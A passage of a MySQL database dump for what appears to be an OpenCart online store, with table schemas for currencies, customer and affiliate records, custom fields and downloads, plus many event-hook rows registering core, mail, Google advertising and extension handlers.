  `value` double(15,8) NOT NULL,
  `status` tinyint(1) NOT NULL,
  `date_modified` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `currency`
--

INSERT INTO `currency` (`currency_id`, `title`, `code`, `symbol_left`, `symbol_right`, `decimal_place`, `value`, `status`, `date_modified`) VALUES
(1, 'Pound Sterling', 'GBP', '£', '', '2', 0.11050000, 1, '2023-02-04 06:56:45'),
(2, 'US Dollar', 'USD', '$', '', '2', 0.13300000, 1, '2023-02-04 14:59:13'),
(3, 'Euro', 'EUR', 'EU€', '', '2', 0.12300000, 1, '2023-02-04 06:48:33'),
(4, 'Hong Kong Dollar', 'HKD', 'HK$', '', '0', 1.00000000, 1, '2023-05-02 14:33:43'),
(5, 'Canada Dollar', 'CAD', 'CA$', '', '2', 0.17800000, 1, '2023-02-04 06:47:55'),
(6, 'Japan Yen', 'JPY', 'JP￥', '', '0', 17.39999962, 1, '2023-02-04 06:49:29'),
(7, 'Australia Dollar', 'AUD', 'AU$', '', '2', 0.19200000, 1, '2023-02-04 06:50:53');

-- --------------------------------------------------------

--
-- Table structure for table `customer_affiliate`
--

CREATE TABLE `customer_affiliate` (
  `customer_id` int(11) NOT NULL,
  `company` varchar(40) NOT NULL,
  `website` varchar(255) NOT NULL,
  `tracking` varchar(64) NOT NULL,
  `commission` decimal(4,2) NOT NULL DEFAULT 0.00,
  `tax` varchar(64) NOT NULL,
  `payment` varchar(6) NOT NULL,
  `cheque` varchar(100) NOT NULL,
  `paypal` varchar(64) NOT NULL,
  `bank_name` varchar(64) NOT NULL,
  `bank_branch_number` varchar(64) NOT NULL,
  `bank_swift_code` varchar(64) NOT NULL,
  `bank_account_name` varchar(64) NOT NULL,
  `bank_account_number` varchar(64) NOT NULL,
  `custom_field` text NOT NULL,
  `status` tinyint(1) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_approval`
--

CREATE TABLE `customer_approval` (
  `customer_approval_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `type` varchar(9) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_group`
--

CREATE TABLE `customer_group` (
  `customer_group_id` int(11) NOT NULL,
  `approval` int(1) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `customer_group`
--

INSERT INTO `customer_group` (`customer_group_id`, `approval`, `sort_order`) VALUES
(1, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `customer_group_description`
--

CREATE TABLE `customer_group_description` (
  `customer_group_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `name` varchar(32) NOT NULL,
  `description` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `customer_group_description`
--

INSERT INTO `customer_group_description` (`customer_group_id`, `language_id`, `name`, `description`) VALUES
(1, 1, 'Default', 'test');

-- --------------------------------------------------------

--
-- Table structure for table `customer_history`
--

CREATE TABLE `customer_history` (
  `customer_history_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `comment` text NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_ip`
--

CREATE TABLE `customer_ip` (
  `customer_ip_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `ip` varchar(40) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_login`
--

CREATE TABLE `customer_login` (
  `customer_login_id` int(11) NOT NULL,
  `email` varchar(96) NOT NULL,
  `ip` varchar(40) NOT NULL,
  `total` int(4) NOT NULL,
  `date_added` datetime NOT NULL,
  `date_modified` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_online`
--

CREATE TABLE `customer_online` (
  `ip` varchar(40) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `url` text NOT NULL,
  `referer` text NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_reward`
--

CREATE TABLE `customer_reward` (
  `customer_reward_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL DEFAULT 0,
  `order_id` int(11) NOT NULL DEFAULT 0,
  `description` text NOT NULL,
  `points` int(8) NOT NULL DEFAULT 0,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_search`
--

CREATE TABLE `customer_search` (
  `customer_search_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `keyword` varchar(255) NOT NULL,
  `category_id` int(11) DEFAULT NULL,
  `sub_category` tinyint(1) NOT NULL,
  `description` tinyint(1) NOT NULL,
  `products` int(11) NOT NULL,
  `ip` varchar(40) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_transaction`
--

CREATE TABLE `customer_transaction` (
  `customer_transaction_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `order_id` int(11) NOT NULL,
  `description` text NOT NULL,
  `amount` decimal(15,4) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `customer_wishlist`
--

CREATE TABLE `customer_wishlist` (
  `customer_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `custom_field`
--

CREATE TABLE `custom_field` (
  `custom_field_id` int(11) NOT NULL,
  `type` varchar(32) NOT NULL,
  `value` text NOT NULL,
  `validation` varchar(255) NOT NULL,
  `location` varchar(10) NOT NULL,
  `status` tinyint(1) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `custom_field`
--

INSERT INTO `custom_field` (`custom_field_id`, `type`, `value`, `validation`, `location`, `status`, `sort_order`) VALUES
(1, 'radio', '', '', 'account', 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `custom_field_customer_group`
--

CREATE TABLE `custom_field_customer_group` (
  `custom_field_id` int(11) NOT NULL,
  `customer_group_id` int(11) NOT NULL,
  `required` tinyint(1) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `custom_field_customer_group`
--

INSERT INTO `custom_field_customer_group` (`custom_field_id`, `customer_group_id`, `required`) VALUES
(1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `custom_field_description`
--

CREATE TABLE `custom_field_description` (
  `custom_field_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `name` varchar(128) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `custom_field_description`
--

INSERT INTO `custom_field_description` (`custom_field_id`, `language_id`, `name`) VALUES
(1, 1, 'Gender'),
(1, 2, '性別');

-- --------------------------------------------------------

--
-- Table structure for table `custom_field_value`
--

CREATE TABLE `custom_field_value` (
  `custom_field_value_id` int(11) NOT NULL,
  `custom_field_id` int(11) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `custom_field_value`
--

INSERT INTO `custom_field_value` (`custom_field_value_id`, `custom_field_id`, `sort_order`) VALUES
(1, 1, 0),
(2, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `custom_field_value_description`
--

CREATE TABLE `custom_field_value_description` (
  `custom_field_value_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `custom_field_id` int(11) NOT NULL,
  `name` varchar(128) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `custom_field_value_description`
--

INSERT INTO `custom_field_value_description` (`custom_field_value_id`, `language_id`, `custom_field_id`, `name`) VALUES
(1, 1, 1, 'Female'),
(1, 2, 1, '女'),
(2, 1, 1, 'Male'),
(2, 2, 1, '男');

-- --------------------------------------------------------

--
-- Table structure for table `download`
--

CREATE TABLE `download` (
  `download_id` int(11) NOT NULL,
  `filename` varchar(160) NOT NULL,
  `mask` varchar(128) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `download_description`
--

CREATE TABLE `download_description` (
  `download_id` int(11) NOT NULL,
  `language_id` int(11) NOT NULL,
  `name` varchar(64) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `event`
--

CREATE TABLE `event` (
  `event_id` int(11) NOT NULL,
  `code` varchar(64) NOT NULL,
  `trigger` text NOT NULL,
  `action` text NOT NULL,
  `status` tinyint(1) NOT NULL,
  `sort_order` int(3) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `event`
--

INSERT INTO `event` (`event_id`, `code`, `trigger`, `action`, `status`, `sort_order`) VALUES
(1, 'activity_customer_add', 'catalog/model/account/customer/addCustomer/after', 'event/activity/addCustomer', 1, 0),
(2, 'activity_customer_edit', 'catalog/model/account/customer/editCustomer/after', 'event/activity/editCustomer', 1, 0),
(3, 'activity_customer_password', 'catalog/model/account/customer/editPassword/after', 'event/activity/editPassword', 1, 0),
(4, 'activity_customer_forgotten', 'catalog/model/account/customer/editCode/after', 'event/activity/forgotten', 1, 0),
(5, 'activity_transaction', 'catalog/model/account/customer/addTransaction/after', 'event/activity/addTransaction', 1, 0),
(6, 'activity_customer_login', 'catalog/model/account/customer/deleteLoginAttempts/after', 'event/activity/login', 1, 0),
(7, 'activity_address_add', 'catalog/model/account/address/addAddress/after', 'event/activity/addAddress', 1, 0),
(8, 'activity_address_edit', 'catalog/model/account/address/editAddress/after', 'event/activity/editAddress', 1, 0),
(9, 'activity_address_delete', 'catalog/model/account/address/deleteAddress/after', 'event/activity/deleteAddress', 1, 0),
(10, 'activity_affiliate_add', 'catalog/model/account/customer/addAffiliate/after', 'event/activity/addAffiliate', 1, 0),
(11, 'activity_affiliate_edit', 'catalog/model/account/customer/editAffiliate/after', 'event/activity/editAffiliate', 1, 0),
(12, 'activity_order_add', 'catalog/model/checkout/order/addOrderHistory/before', 'event/activity/addOrderHistory', 1, 0),
(13, 'activity_return_add', 'catalog/model/account/return/addReturn/after', 'event/activity/addReturn', 1, 0),
(14, 'mail_transaction', 'catalog/model/account/customer/addTransaction/after', 'mail/transaction', 1, 0),
(15, 'mail_forgotten', 'catalog/model/account/customer/editCode/after', 'mail/forgotten', 1, 0),
(16, 'mail_customer_add', 'catalog/model/account/customer/addCustomer/after', 'mail/register', 1, 0),
(17, 'mail_customer_alert', 'catalog/model/account/customer/addCustomer/after', 'mail/register/alert', 1, 0),
(18, 'mail_affiliate_add', 'catalog/model/account/customer/addAffiliate/after', 'mail/affiliate', 1, 0),
(19, 'mail_affiliate_alert', 'catalog/model/account/customer/addAffiliate/after', 'mail/affiliate/alert', 1, 0),
(20, 'mail_voucher', 'catalog/model/checkout/order/addOrderHistory/after', 'extension/total/voucher/send', 1, 0),
(21, 'mail_order_add', 'catalog/model/checkout/order/addOrderHistory/before', 'mail/order', 1, 0),
(22, 'mail_order_alert', 'catalog/model/checkout/order/addOrderHistory/before', 'mail/order/alert', 1, 0),
(23, 'statistics_review_add', 'catalog/model/catalog/review/addReview/after', 'event/statistics/addReview', 1, 0),
(24, 'statistics_return_add', 'catalog/model/account/return/addReturn/after', 'event/statistics/addReturn', 1, 0),
(25, 'statistics_order_history', 'catalog/model/checkout/order/addOrderHistory/after', 'event/statistics/addOrderHistory', 1, 0),
(26, 'admin_mail_affiliate_approve', 'admin/model/customer/customer_approval/approveAffiliate/after', 'mail/affiliate/approve', 1, 0),
(27, 'admin_mail_affiliate_deny', 'admin/model/customer/customer_approval/denyAffiliate/after', 'mail/affiliate/deny', 1, 0),
(28, 'admin_mail_customer_approve', 'admin/model/customer/customer_approval/approveCustomer/after', 'mail/customer/approve', 1, 0),
(29, 'admin_mail_customer_deny', 'admin/model/customer/customer_approval/denyCustomer/after', 'mail/customer/deny', 1, 0),
(30, 'admin_mail_reward', 'admin/model/customer/customer/addReward/after', 'mail/reward', 1, 0),
(31, 'admin_mail_transaction', 'admin/model/customer/customer/addTransaction/after', 'mail/transaction', 1, 0),
(32, 'admin_mail_return', 'admin/model/sale/return/addReturnHistory/after', 'mail/return', 1, 0),
(33, 'admin_mail_forgotten', 'admin/model/user/user/editCode/after', 'mail/forgotten', 1, 0),
(34, 'advertise_google', 'admin/model/catalog/product/deleteProduct/after', 'extension/advertise/google/deleteProduct', 1, 0),
(35, 'advertise_google', 'admin/model/catalog/product/copyProduct/after', 'extension/advertise/google/copyProduct', 1, 0),
(36, 'advertise_google', 'admin/view/common/column_left/before', 'extension/advertise/google/admin_link', 1, 0),
(37, 'advertise_google', 'admin/model/catalog/product/addProduct/after', 'extension/advertise/google/addProduct', 1, 0),
(38, 'advertise_google', 'catalog/controller/checkout/success/before', 'extension/advertise/google/before_checkout_success', 1, 0),
(39, 'advertise_google', 'catalog/view/common/header/after', 'extension/advertise/google/google_global_site_tag', 1, 0),
(40, 'advertise_google', 'catalog/view/common/success/after', 'extension/advertise/google/google_dynamic_remarketing_purchase', 1, 0),
(41, 'advertise_google', 'catalog/view/product/product/after', 'extension/advertise/google/google_dynamic_remarketing_product', 1, 0),
(42, 'advertise_google', 'catalog/view/product/search/after', 'extension/advertise/google/google_dynamic_remarketing_searchresults', 1, 0),
(43, 'advertise_google', 'catalog/view/product/category/after', 'extension/advertise/google/google_dynamic_remarketing_category', 1, 0),
(44, 'advertise_google', 'catalog/view/common/home/after', 'extension/advertise/google/google_dynamic_remarketing_home', 1, 0),
(45, 'advertise_google', 'catalog/view/checkout/cart/after', 'extension/advertise/google/google_dynamic_remarketing_cart', 1, 0),
(46, 'admin_module_admin_quick_edit_menu', 'admin/view/common/column_left/before', 'extension/module/admin_quick_edit/menu_hook', 1, 0),
(47, 'admin_module_admin_quick_edit_design_seo_url_index', 'admin/controller/design/seo_url/before', 'extension/module/admin_quick_edit/design_seo_url_index_hook', 1, 0),
(48, 'admin_module_admin_quick_edit_design_seo_url_delete', 'admin/controller/design/seo_url/delete/before', 'extension/module/admin_quick_edit/design_seo_url_delete_hook', 1, 0),
(49, 'admin_module_admin_quick_edit_design_seo_url_form', 'admin/view/design/seo_url_form/before', 'extension/module/admin_quick_edit/design_seo_url_form_hook', 1, 0),
(50, 'admin_module_admin_quick_edit_customer_customer_index', 'admin/controller/customer/customer/before', 'extension/module/admin_quick_edit/customer_customer_index_hook', 1, 0),
(51, 'admin_module_admin_quick_edit_customer_customer_delete', 'admin/controller/customer/customer/delete/before', 'extension/module/admin_quick_edit/customer_customer_delete_hook', 1, 0),
(52, 'admin_module_admin_quick_edit_customer_customer_form', 'admin/view/customer/customer_form/before', 'extension/module/admin_quick_edit/customer_customer_form_hook', 1, 0),
(53, 'admin_module_admin_quick_edit_marketing_coupon_index', 'admin/controller/marketing/coupon/before', 'extension/module/admin_quick_edit/marketing_coupon_index_hook', 1, 0),
(54, 'admin_module_admin_quick_edit_marketing_coupon_delete', 'admin/controller/marketing/coupon/delete/before', 'extension/module/admin_quick_edit/marketing_coupon_delete_hook', 1, 0),
(55, 'admin_module_admin_quick_edit_marketing_coupon_form', 'admin/view/marketing/coupon_form/before', 'extension/module/admin_quick_edit/marketing_coupon_form_hook', 1, 0),
(56, 'admin_module_admin_quick_edit_marketing_marketing_index', 'admin/controller/marketing/marketing/before', 'extension/module/admin_quick_edit/marketing_marketing_index_hook', 1, 0),
(57, 'admin_module_admin_quick_edit_marketing_marketing_delete', 'admin/controller/marketing/marketing/delete/before', 'extension/module/admin_quick_edit/marketing_marketing_delete_hook', 1, 0),
(58, 'admin_module_admin_quick_edit_marketing_marketing_form', 'admin/view/marketing/marketing_form/before', 'extension/module/admin_quick_edit/marketing_marketing_form_hook', 1, 0),
(59, 'admin_module_admin_quick_edit_sale_return_index', 'admin/controller/sale/return/before', 'extension/module/admin_quick_edit/sale_return_index_hook', 1, 0),
(60, 'admin_module_admin_quick_edit_sale_return_delete', 'admin/controller/sale/return/delete/before', 'extension/module/admin_quick_edit/sale_return_delete_hook', 1, 0),
(61, 'admin_module_admin_quick_edit_sale_return_form', 'admin/view/sale/return_form/before', 'extension/module/admin_quick_edit/sale_return_form_hook', 1, 0),
(62, 'admin_module_admin_quick_edit_sale_voucher_index', 'admin/controller/sale/voucher/before', 'extension/module/admin_quick_edit/sale_voucher_index_hook', 1, 0),
(63, 'admin_module_admin_quick_edit_sale_voucher_delete', 'admin/controller/sale/voucher/delete/before', 'extension/module/admin_quick_edit/sale_voucher_delete_hook', 1, 0),
(64, 'admin_module_admin_quick_edit_sale_voucher_form', 'admin/view/sale/voucher_form/before', 'extension/module/admin_quick_edit/sale_voucher_form_hook', 1, 0),
(65, 'admin_module_admin_quick_edit_sale_voucher_theme_index', 'admin/controller/sale/voucher_theme/before', 'extension/module/admin_quick_edit/sale_voucher_theme_index_hook', 1, 0),
(66, 'admin_module_admin_quick_edit_sale_voucher_theme_delete', 'admin/controller/sale/voucher_theme/delete/before', 'extension/module/admin_quick_edit/sale_voucher_theme_delete_hook', 1, 0),
(67, 'admin_module_admin_quick_edit_sale_voucher_theme_form', 'admin/view/sale/voucher_theme_form/before', 'extension/module/admin_quick_edit/sale_voucher_theme_form_hook', 1, 0),
(68, 'admin_module_admin_quick_edit_catalog_information_index', 'admin/controller/catalog/information/before', 'extension/module/admin_quick_edit/catalog_information_index_hook', 1, 0),
(69, 'admin_module_admin_quick_edit_catalog_information_delete', 'admin/controller/catalog/information/delete/before', 'extension/module/admin_quick_edit/catalog_information_delete_hook', 1, 0),
(70, 'admin_module_admin_quick_edit_catalog_information_form', 'admin/view/catalog/information_form/before', 'extension/module/admin_quick_edit/catalog_information_form_hook', 1, 0),
(71, 'admin_module_admin_quick_edit_catalog_review_index', 'admin/controller/catalog/review/before', 'extension/module/admin_quick_edit/catalog_review_index_hook', 1, 0),
(72, 'admin_module_admin_quick_edit_catalog_review_delete', 'admin/controller/catalog/review/delete/before', 'extension/module/admin_quick_edit/catalog_review_delete_hook', 1, 0),
(73, 'admin_module_admin_quick_edit_catalog_review_form', 'admin/view/catalog/review_form/before', 'extension/module/admin_quick_edit/catalog_review_form_hook', 1, 0),
(74, 'admin_module_admin_quick_edit_catalog_download_index', 'admin/controller/catalog/download/before', 'extension/module/admin_quick_edit/catalog_download_index_hook', 1, 0),
(75, 'admin_module_admin_quick_edit_catalog_download_delete', 'admin/controller/catalog/download/delete/before', 'extension/module/admin_quick_edit/catalog_download_delete_hook', 1, 0),
(76, 'admin_module_admin_quick_edit_catalog_download_form', 'admin/view/catalog/download_form/before', 'extension/module/admin_quick_edit/catalog_download_form_hook', 1, 0),
(77, 'admin_module_admin_quick_edit_catalog_manufacturer_index', 'admin/controller/catalog/manufacturer/before', 'extension/module/admin_quick_edit/catalog_manufacturer_index_hook', 1, 0),
(78, 'admin_module_admin_quick_edit_catalog_manufacturer_delete', 'admin/controller/catalog/manufacturer/delete/before', 'extension/module/admin_quick_edit/catalog_manufacturer_delete_hook', 1, 0),
(79, 'admin_module_admin_quick_edit_catalog_manufacturer_form', 'admin/view/catalog/manufacturer_form/before', 'extension/module/admin_quick_edit/catalog_manufacturer_form_hook', 1, 0),
(80, 'admin_module_admin_quick_edit_catalog_option_index', 'admin/controller/catalog/option/before', 'extension/module/admin_quick_edit/catalog_option_index_hook', 1, 0),
(81, 'admin_module_admin_quick_edit_catalog_option_delete', 'admin/controller/catalog/option/delete/before', 'extension/module/admin_quick_edit/catalog_option_delete_hook', 1, 0),
(82, 'admin_module_admin_quick_edit_catalog_option_form', 'admin/view/catalog/option_form/before', 'extension/module/admin_quick_edit/catalog_option_form_hook', 1, 0),
(83, 'admin_module_admin_quick_edit_catalog_attribute_group_index', 'admin/controller/catalog/attribute_group/before', 'extension/module/admin_quick_edit/catalog_attribute_group_index_hook', 1, 0),
(84, 'admin_module_admin_quick_edit_catalog_attribute_group_delete', 'admin/controller/catalog/attribute_group/delete/before', 'extension/module/admin_quick_edit/catalog_attribute_group_delete_hook', 1, 0),
(85, 'admin_module_admin_quick_edit_catalog_attribute_group_form', 'admin/view/catalog/attribute_group_form/before', 'extension/module/admin_quick_edit/catalog_attribute_group_form_hook', 1, 0),
(86, 'admin_module_admin_quick_edit_catalog_attribute_index', 'admin/controller/catalog/attribute/before', 'extension/module/admin_quick_edit/catalog_attribute_index_hook', 1, 0),
(87, 'admin_module_admin_quick_edit_catalog_attribute_delete', 'admin/controller/catalog/attribute/delete/before', 'extension/module/admin_quick_edit/catalog_attribute_delete_hook', 1, 0),
(88, 'admin_module_admin_quick_edit_catalog_attribute_form', 'admin/view/catalog/attribute_form/before', 'extension/module/admin_quick_edit/catalog_attribute_form_hook', 1, 0),
(89, 'admin_module_admin_quick_edit_catalog_filter_index', 'admin/controller/catalog/filter/before', 'extension/module/admin_quick_edit/catalog_filter_index_hook', 1, 0),
(90, 'admin_module_admin_quick_edit_catalog_filter_delete', 'admin/controller/catalog/filter/delete/before', 'extension/module/admin_quick_edit/catalog_filter_delete_hook', 1, 0),
(91, 'admin_module_admin_quick_edit_catalog_filter_form', 'admin/view/catalog/filter_form/before', 'extension/module/admin_quick_edit/catalog_filter_form_hook', 1, 0),
(92, 'admin_module_admin_quick_edit_catalog_recurring_index', 'admin/controller/catalog/recurring/before', 'extension/module/admin_quick_edit/catalog_recurring_index_hook', 1, 0),
(93, 'admin_module_admin_quick_edit_catalog_recurring_delete', 'admin/controller/catalog/recurring/delete/before', 'extension/module/admin_quick_edit/catalog_recurring_delete_hook', 1, 0),
(94, 'admin_module_admin_quick_edit_catalog_recurring_copy', 'admin/controller/catalog/recurring/copy/before', 'extension/module/admin_quick_edit/catalog_recurring_copy_hook', 1, 0),
(95, 'admin_module_admin_quick_edit_catalog_recurring_form', 'admin/view/catalog/recurring_form/before', 'extension/module/admin_quick_edit/catalog_recurring_form_hook', 1, 0),
(96, 'admin_module_admin_quick_edit_catalog_category_index', 'admin/controller/catalog/category/before', 'extension/module/admin_quick_edit/catalog_category_index_hook', 1, 0),
(97, 'admin_module_admin_quick_edit_catalog_category_delete', 'admin/controller/catalog/category/delete/before', 'extension/module/admin_quick_edit/catalog_category_delete_hook', 1, 0),
(98, 'admin_module_admin_quick_edit_catalog_category_form', 'admin/view/catalog/category_form/before', 'extension/module/admin_quick_edit/catalog_category_form_hook', 1, 0),
(99, 'admin_module_admin_quick_edit_catalog_product_index', 'admin/controller/catalog/product/before', 'extension/module/admin_quick_edit/catalog_product_index_hook', 1, 0),
(100, 'admin_module_admin_quick_edit_catalog_product_delete', 'admin/controller/catalog/product/delete/before', 'extension/module/admin_quick_edit/catalog_product_delete_hook', 1, 0),
(101, 'admin_module_admin_quick_edit_catalog_product_copy', 'admin/controller/catalog/product/copy/before', 'extension/module/admin_quick_edit/catalog_product_copy_hook', 1, 0),
(102, 'admin_module_admin_quick_edit_catalog_product_form', 'admin/view/catalog/product_form/before', 'extension/module/admin_quick_edit/catalog_product_form_hook', 1, 0),
(454, 'may_ao_cv_octmoctpp_after', 'catalog/view/extension/module/uni_quick_order/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(455, 'may_ao_cv_uniemuniqo_before', 'catalog/view/extension/module/uni_quick_order/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(453, 'may_ao_cv_octmoctpp_before', 'catalog/view/octemplates/module/oct_popup_purchase/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(452, 'may_ao_cv_emqvp_after', 'catalog/view/extension/module/quickviewpro/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(450, 'may_ao_cv_emnfoc_before', 'catalog/view/extension/module/newfastordercart/before', 'extension/may/advanced_options/vCommonCartBefore', 1, 0),
(451, 'may_ao_cv_emqvp_before', 'catalog/view/extension/module/quickviewpro/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(449, 'may_ao_cv_pcg_before', 'catalog/view/product/cyber_gallery/before', 'extension/may/advanced_options/vProductCyberGalleryBefore', 1, 0),
(444, 'may_ao_cc_scca_before', 'catalog/controller/extension/soconfig/cart/add/before', 'extension/may/advanced_options/cSoconfigCartAddBefore', 1, 0),
(445, 'may_ao_cv_scqc_before', 'catalog/view/soconfig/quickcart/before', 'extension/may/advanced_options/vSoconfigQuickcartBefore', 1, 0),
(446, 'may_ao_cm_sochgp_after', 'catalog/model/extension/module/so_onepagecheckout/getProducts/after', 'extension/may/advanced_options/mSoonepagecheckoutGetProductsAfter', 1, 0),
(447, 'may_ao_cv_pqq_before', 'catalog/view/product/quickview/quickview/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(448, 'may_ao_cv_pqq_after', 'catalog/view/product/quickview/quickview/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(441, 'may_ao_cv_pfc_after', 'catalog/view/plaza/filter/category', 'extension/may/advanced_options/vAjaxCategoryAfter', 1, 0),
(442, 'may_ao_cv_scqv_before', 'catalog/view/soconfig/quickview/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(443, 'may_ao_cv_scqv_after', 'catalog/view/soconfig/quickview/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(440, 'may_ao_cv_pfc_before', 'catalog/view/plaza/filter/category', 'extension/may/advanced_options/vProductCategoryBefore', 1, 0),
(437, 'may_ao_cv_ppqp_before', 'catalog/view/plaza/quickview/product/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(438, 'may_ao_cv_ppqp_after', 'catalog/view/plaza/quickview/product/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(439, 'may_ao_cv_pmptp_before', 'catalog/view/plaza/module/ptproducts/before', 'extension/may/advanced_options/vPlazaModulePtProductsBefore', 1, 0),
(436, 'may_ao_cv_emoctp_before', 'catalog/view/extension/module/octabproducts/before', 'extension/may/advanced_options/vExtensionModuleOCTabProductsBefore', 1, 0),
(433, 'may_ao_cv_emoclnoccf_before', 'catalog/view/extension/module/oclayerednavigation/occategoryfilter/before', 'extension/may/advanced_options/vProductCategoryBefore', 1, 0),
(434, 'may_ao_cv_emoclnoccf_after', 'catalog/view/extension/module/oclayerednavigation/occategoryfilter/after', 'extension/may/advanced_options/vAjaxCategoryAfter', 1, 0),
(435, 'may_ao_cv_emocp_before', 'catalog/view/extension/module/ocproduct/before', 'extension/may/advanced_options/vExtensionModuleOCProductBefore', 1, 0),
(431, 'may_ao_cv_poqp_after', 'catalog/view/product/ocquickview/product/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(432, 'may_ao_cv_emoclnocc_before', 'catalog/view/extension/module/oclayerednavigation/occategory/before', 'extension/may/advanced_options/vProductCategoryBefore', 1, 0),
(430, 'may_ao_cv_poqp_before', 'catalog/view/product/ocquickview/product/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(429, 'may_ao_cv_zemez_emzscp_before', 'catalog/view/extension/module/zemez_single_category_product/before', 'extension/may/advanced_options/vZemezSingleCategoryProductBefore', 1, 0),
(428, 'may_ao_cv_zemez_emzaqv_after', 'catalog/view/extension/module/zemez_ajax_quick_view/after', 'extension/may/advanced_options/vZemezAjaxQuickviewAfter', 1, 0),
(424, 'may_ao_cv_pq_after', 'catalog/view/product/quickview/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(425, 'may_ao_kenza_cv_pq_before', 'catalog/view/product/quick_view/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(426, 'may_ao_kenza_cv_pq_after', 'catalog/view/product/quick_view/after', 'extension/may/advanced_options/vProductQuickviewAfter', 1, 0),
(427, 'may_ao_cv_zemez_emzaqv_before', 'catalog/view/extension/module/zemez_ajax_quick_view/before', 'extension/may/advanced_options/vZemezAjaxQuickviewBefore', 1, 0),
(423, 'may_ao_cv_pq_before', 'catalog/view/product/quickview/before', 'extension/may/advanced_options/vProductQuickviewBefore', 1, 0),
(422, 'may_ao_cm_j3os_before', 'catalog/model/journal3/order/save/before', 'extension/may/advanced_options/mJournal3OrderSaveBefore', 1, 0),
(420, 'may_ao_cv_j3mp_before', 'catalog/view/journal3/module/products/before', 'extension/may/advanced_options/vJournal3ModuleProductsBefore', 1, 0),
(421, 'may_ao_cm_dispatch_json_before', 'catalog/model/extension/may/advanced_options/dispatchJson/before', 'extension/may/advanced_options/mDispatchJsonBefore', 1, 0),
(419, 'may_ao_cv_j3chch_before', 'catalog/view/journal3/checkout/checkout/before', 'extension/may/advanced_options/vJournal3CheckoutCheckoutBefore', 1, 0),
(418, 'may_ao_cv_j3chc_before', 'catalog/view/journal3/checkout/cart/before', 'extension/may/advanced_options/vJournal3CheckoutCartBefore', 1, 0),
(417, 'may_ao_cc_j3nc_before', 'catalog/controller/journal3/notification/cart/before', 'extension/may/advanced_options/cJournal3NotificationCartBefore', 1, 0),
